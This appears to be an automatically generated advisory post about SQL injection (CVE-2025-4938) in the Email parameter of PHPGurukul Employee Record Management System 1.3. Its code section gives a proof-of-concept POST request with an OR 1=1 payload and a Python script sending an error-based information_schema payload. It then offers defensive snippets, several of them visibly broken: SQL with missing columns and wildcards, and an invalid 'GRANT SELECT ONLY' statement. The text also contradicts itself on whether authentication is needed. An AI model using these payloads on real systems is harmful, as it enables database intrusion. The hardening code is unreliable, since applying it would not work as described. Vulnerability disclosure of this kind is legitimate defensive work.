PHPGurukul Employee Record Management System, SQL Injection, CVE-2025-4938 (Critical)

Listen to this Post

How CVE-2025-4938 Works

The vulnerability exists in the `/registererms.php` file of PHPGurukul Employee Record Management System 1.3. Attackers can exploit improper input sanitization of the `Email` parameter to inject malicious SQL queries. When user-supplied data is directly concatenated into SQL statements without proper escaping, attackers can manipulate database operations. The flaw allows remote unauthenticated attackers to execute arbitrary SQL commands through crafted HTTP requests, potentially leading to data leakage, authentication bypass, or complete system compromise. The CVSS 4.0 vector (AV:N/AC:L/PR:L/UI:N) confirms network accessibility with low attack complexity.

DailyCVE Form

Platform: PHPGurukul ERMS
Version: 1.3
Vulnerability: SQL Injection
Severity: Critical
Date: 2025-05-27

Prediction: Patch by 2025-06-15

What Undercode Say:

-- Exploit PoC
POST /registererms.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Email='+OR+1=1--+-
Scanner script
import requests
url = "http://target.com/registererms.php"
payload = {"Email": "test' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--"}
r = requests.post(url, data=payload)
if "error" in r.text: print("Vulnerable")
// Protection code
$email = mysqli_real_escape_string($conn, $_POST['Email']);
$query = "SELECT FROM users WHERE email = '$email'";
WAF rule
ModSecurity Rule:
SecRule ARGS:Email "@detectSQLi" "id:1001,deny,status:403"
-- Database hardening
REVOKE ALL PRIVILEGES ON . FROM 'erms_user'@'%';
GRANT SELECT ONLY ON erms_db. TO 'erms_user'@'localhost';
Server protection
location ~ registererms.php {
limit_req zone=antidos;
include /etc/nginx/snippets/sql_injection.conf;
}
<!-- Patch verification -->
<testsuite>
<testcase name="SQLi_Email_Parameter">
<input>test' OR '1'='1</input>
<expected>sanitized_value</expected>
</testcase>
</testsuite>

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top